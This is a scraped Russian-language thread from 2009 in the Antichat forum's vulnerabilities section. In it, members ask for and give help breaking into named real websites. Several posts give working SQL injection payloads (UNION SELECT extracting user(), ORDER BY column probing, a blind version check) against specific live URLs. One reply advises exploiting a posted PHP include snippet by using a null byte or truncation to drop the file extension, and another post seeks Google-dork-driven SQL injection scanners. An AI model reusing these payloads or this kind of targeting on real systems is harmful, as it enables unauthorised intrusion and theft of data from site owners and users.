HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7681  
Старый 16.06.2009, 08:10
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

а понял значит я перепутал, спасибо
 
Ответить с цитированием

  #7682  
Старый 16.06.2009, 10:22
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://www.mieszkania.inter-bud.pl/m-os.php?id=115
PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи
Код:
http://www.gambitlive.com/night.php?id=90
MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?

Последний раз редактировалось mailbrush; 16.06.2009 в 10:30..
 
Ответить с цитированием

  #7683  
Старый 16.06.2009, 11:15
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

Подскажие пожалуйста сканеры ТОЛЬКО SQL-inj , которые сканировали бы, например, сайт на параметарезированные ссылки. (Что-то типа запроса к гуглу: site: moy_Sayt.ru inurl:"ID=")
SIPT,NetDeviLz SQL Scanner не катят))
 
Ответить с цитированием

  #7684  
Старый 16.06.2009, 11:17
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами: 8941129

Репутация: 7
По умолчанию

Цитата:
Сообщение от mailbrush  
http://forum.antichat.ru/thread49775.html
Архивчик битый в этой теме, перезалейте плиз.
 
Ответить с цитированием

  #7685  
Старый 16.06.2009, 11:31
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
http://www.mieszkania.inter-bud.pl/m-os.php?id=115
PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи
Код:
http://www.gambitlive.com/night.php?id=90
MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?

можно, вот:
Цитата:
http://www.gambitlive.com/index.php?page=gallery&&albumid=409+union+select+1 ,user(),3,4,5,6,7,8+limit+1,1--
 
Ответить с цитированием

  #7686  
Старый 16.06.2009, 14:39
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

никак не могу подобрать столбцы, хотя на лицо, что это обычная MySQL inj
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619
подскажите плиз))
 
Ответить с цитированием

  #7687  
Старый 16.06.2009, 14:47
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию

http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+order+b y+4/*

4-ый мускул
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+and+sub string(version(),1,1)=4

p.s. раскручивайте её как слепую, имхо.

Последний раз редактировалось AlexSatter; 16.06.2009 в 15:04..
 
Ответить с цитированием

  #7688  
Старый 16.06.2009, 14:52
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

PHP код:
if (!IsSet($t)&!IsSet($f))
    {
    
$f="main";
    
$filename=$f ".php";
    }
    else
        {
        if (IsSet(
$t)&!IsSet($f))
            {
            
$filename=$t "/index.php";
            }
        if (IsSet(
$t)&IsSet($f))
            {
            
$filename$t "/" $f ".php";
            }
        if (!IsSet(
$t)&IsSet($f))
            {
            
$filename=$f ".php";
            }
}
if (
file_exists("$filename"))
{ include(
"$filename"); }
else
{ echo 
" <div class=\"alert\">  404,   . </div>"; } 
Можно ли в такое инъекцию провести и как?
 
Ответить с цитированием

  #7689  
Старый 16.06.2009, 14:57
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию

насколько позволяет моя квалификация... в этом коде возможна php-inj
защиты тут в общем-то никакой нет.

расширение отбрасывайте с помощью null-byte либо с помощью усечения...

Последний раз редактировалось AlexSatter; 16.06.2009 в 15:12..
 
Ответить с цитированием

  #7690  
Старый 16.06.2009, 15:06
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию

2 Byrger
ты же уже задавал этот вопрос, не доходчиво объяснили?
https://forum.antichat.net/printthread.php?t=46016&page=185&pp=40
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.